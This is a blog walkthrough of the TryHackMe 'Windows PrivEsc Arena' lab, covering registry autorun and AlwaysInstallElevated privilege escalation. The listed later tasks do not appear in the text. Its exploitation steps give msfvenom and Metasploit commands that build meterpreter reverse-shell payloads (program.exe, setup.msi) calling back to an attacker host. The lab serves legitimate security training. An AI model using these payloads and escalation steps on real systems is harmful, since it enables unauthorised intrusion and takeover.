文章目录

  • Task 1 Connecting to TryHackMe network
  • Task 2 Deploy the vulnerable machine
  • Task 3 Registry Escalation - Autorun
    • Detection
    • Exploitation
  • Task 4 Registry Escalation - AlwaysInstallElevated
    • Detection
    • Exploitation
    • Windows VM
  • Task 5 Service Escalation - Registry
    • Detection
    • Exploitation
  • Task 6 Service Escalation - Executable Files
    • Detection
    • Exploitation
  • Task 7 Privilege Escalation - Startup Applications
    • Detection
    • Exploitation
  • Task 8 Service Escalation - DLL Hijacking
    • Detection
    • Exploitation
  • Task 9 Service Escalation - binPath
    • Detection
    • Exploitation
  • Task 10 Service Escalation - Unquoted Service Paths
    • Detection
    • Exploitation
  • Task 11 Potato Escalation - Hot Potato
    • Exploitation
  • Task 12 Password Mining Escalation - Configuration Files
    • Exploitation
  • Task 13 Password Mining Escalation - Memory
    • Exploitation
  • Task 14 Privilege Escalation - Kernel Exploits
    • Establish a shell
    • Detection & Exploitation

https://tryhackme.com/room/windowsprivescarena

Task 1 Connecting to TryHackMe network

To complete this room and access the vulnerable Windows machine, you need to first connect to TryHackMe’s VPN. If you’ve not done this before, first complete the OpenVPN room and learn how to connect.

Task 2 Deploy the vulnerable machine

This room will teach you a variety of Windows privilege escalation tactics, including kernel exploits, DLL hijacking, service exploits, registry exploits, and more. This lab was built utilizing Sagi Shahar’s privesc workshop (https://github.com/sagishahar/lpeworkshop) and utilized as part of The Cyber Mentor’s Windows Privilege Escalation Udemy course (http://udemy.com/course/windows-privilege-escalation-for-beginners).

All tools needed to complete this course are on the user desktop (C:\Users\user\Desktop\Tools).

Let’s first connect to the machine. RDP is open on port 3389. Your credentials are:

username: user
password: password321

For any administrative actions you might take, your credentials are:

username: TCM
password: Hacker123

xfreerdp /u:user /p:password321 /cert:ignore /v:10.10.188.179
xfreerdp /u:TCM /p:Hacker123 /cert:ignore /v:10.10.220.147

Task 3 Registry Escalation - Autorun

Detection

Windows VM

  1. Open command prompt and type: C:\Users\User\Desktop\Tools\Autoruns\Autoruns64.exe
  2. In Autoruns, click on the ‘Logon’ tab.
  3. From the listed results, notice that the “My Program” entry is pointing to “C:\Program Files\Autorun Program\program.exe”.
  4. In command prompt type: C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu “C:\Program Files\Autorun Program”
  5. From the output, notice that the “Everyone” user group has “FILE_ALL_ACCESS” permission on the “program

Exploitation

Kali VM

  1. Open command prompt and type: msfconsole
  2. In Metasploit (msf > prompt) type: use multi/handler
  3. In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp
  4. In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]
  5. In Metasploit (msf > prompt) type: run
  6. Open an additional command prompt and type: msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f exe -o program.exe
  7. Copy the generated file, program.exe, to the Windows VM.

Windows VM

  1. Place program.exe in ‘C:\Program Files\Autorun Program’.
  2. To simulate the privilege escalation effect, logoff and then log back on as an administrator user.

Kali VM

  1. Wait for a new session to open in Metasploit.
  2. In Metasploit (msf > prompt) type: sessions -i [Session ID]
  3. To confirm that the attack succeeded, in Metasploit (msf > prompt) type: getuid

Task 4 Registry Escalation - AlwaysInstallElevated

Detection

Windows VM
1.Open command prompt and type: reg query HKLM\Software\Policies\Microsoft\Windows\Installer
2.From the output, notice that “AlwaysInstallElevated” value is 1.
3.In command prompt type: reg query HKCU\Software\Policies\Microsoft\Windows\Installer
4.From the output, notice that “AlwaysInstallElevated” value is 1.

Exploitation

Kali VM

  1. Open command prompt and type: msfconsole
  2. In Metasploit (msf > prompt) type: use multi/handler
  3. In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp
  4. In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]
  5. In Metasploit (msf > prompt) type: run
  6. Open an additional command prompt and type: msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f msi -o setup.msi
  7. Copy the generated file, setup.msi, to the Windows VM.

Windows VM

1.Place ‘setup.msi’ in ‘C:\Temp’.
2.Open command prompt and type: msiexec /quiet /qn /i C:\Temp\setup.msi
`
Enjoy your shell!

TryHackMe学习笔记-Windows PrivEsc Arena相关推荐

  1. 学习笔记:Windows 下Keras安装和配置指南

    目录: 目录: Windows下Keras安装和配置指南 Keras 框架搭建 安装 本系列参考官方文档官方文档 这就是keras可以参考前篇:这就是keras 学习笔记 Keras:一些基本概念 一 ...

  2. 学习笔记-Windows 安全

    Windows 安全 注 : 笔记中拓扑图 drawio 源文件在其图片目录下 免责声明 本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关. 大纲 漏 ...

  3. 学习笔记-Windows 基础服务搭建

    Windows 基础服务搭建 磁盘管理 例1 新建两个 10G 的硬盘,名称为 A-10-1.A-10-2,挂载到主机; 新建镜像卷,使用所有空间,驱动器号为 D. 1. 开始--管理工具--计算机管 ...

  4. TryHackMe学习笔记-The Cod Caper

    文章目录 概述 端口扫描 80端口漏洞利用 Web页面访问 目录扫描 SQL注入 命令执行 - 初始立足点 敏感文件查找 LinEnum 提权 gdb 利用pwntools溢出 hashcat破解ha ...

  5. 《Windows via C/C++》学习笔记 —— Windows 线程池

    线程池(thread pool),允许有多个线程同时存在,并发执行,并且这些线程受到统一管理. 在Windows Vista中,提供了全新的线程池机制,一般这些线程池中的线程的创建的销毁是由操作系统自 ...

  6. C++学习笔记-windows底层粗略认识

    1.所有的软件都运行在内存中(以数字的方式): 2.菜单栏中菜单的排放,在每次运行前都存储在文件中: 3.存放界面信息的地方为"资源文件":[这只是其中的一种方式,现在都是xml的 ...

  7. [学习笔记]Windows CMD/bat

    基础知识 命令帮助的符号解释 Notation Description Text without brackets or braces 必须要输入的命令 <Text inside angle b ...

  8. [学习笔记] windows 下安装nginx和php以及添加yaf框架和redis扩展

    下载nginx和php压缩包 nginx 下载网址:http://nginx.org/en/download.html php 下载网址:http://php.net/downloads.php#v7 ...

  9. Win32学习笔记 - Windows 常用消息大全

    表A-1  Windows消息分布 消息范围 说 明 0 - WM_USER – 1 系统消息 WM_USER - 0x7FFF 自定义窗口类整数消息 WM_APP - 0xBFFF 应用程序自定义消 ...

最新文章

  1. 别说,Cerebro还真好用!老板再也不用担心ES集群了
  2. openCV图像矩阵Mat和二维数组的互相转换
  3. VS2010解决方案位置不对和改变程序字体的方案
  4. Android APP 引导页实现-第一次应用进入时加载
  5. java 168转换成861_java实验-java语言面向对象编程基础
  6. php 下拉菜单多选get,Jquery实现select二级联动多选下拉菜单
  7. 蓝桥杯 基础练习 数的读法
  8. 百度编辑器 ueditor .net开发
  9. sql server concat()函数
  10. shell unexpected operator
  11. 字符串转Json,Json转字符串
  12. 软件测试师网络工程师,【软件测试工程师(华为项目)网络工程师面试题目|面试经验】-看准网...
  13. Java实现冒泡排序(详解)
  14. 什么是爬虫?你了解吗,能干什么,怎么用,让你了解本质
  15. XCode 3 中我的常用快捷键
  16. 玩安卓从 0 到 1 之项目总结
  17. 2011 3D 八卦图 矩阵图
  18. HTTPS与TOKEN
  19. 20201211_127_编码知识_中文乱码问题解决
  20. 2019-10-25考试

热门文章

  1. 字节(b)转换为千字节(kb)和兆(mb)的转换方法
  2. 大学计算机作业互评评语简短,大学学生互评评语100字
  3. 使用GENBANK数据进行分子系统发育树的构建
  4. 基于C#制作一个桌面宠物
  5. 3、乐趣国学—“色难”
  6. html公差符号输入,cad正负公差符号如何输入出来
  7. Saber仿真教程视频 初级 中级 高级
  8. 哪有什么岁月静好,只是有人在替你负重前行。致敬消防员、医护工作者、平凡英雄,感恩有你们。
  9. 拓展 - Webrtc 的回声抵消(aec、aecm)算法简介
  10. windows共享文件创建----局域网办公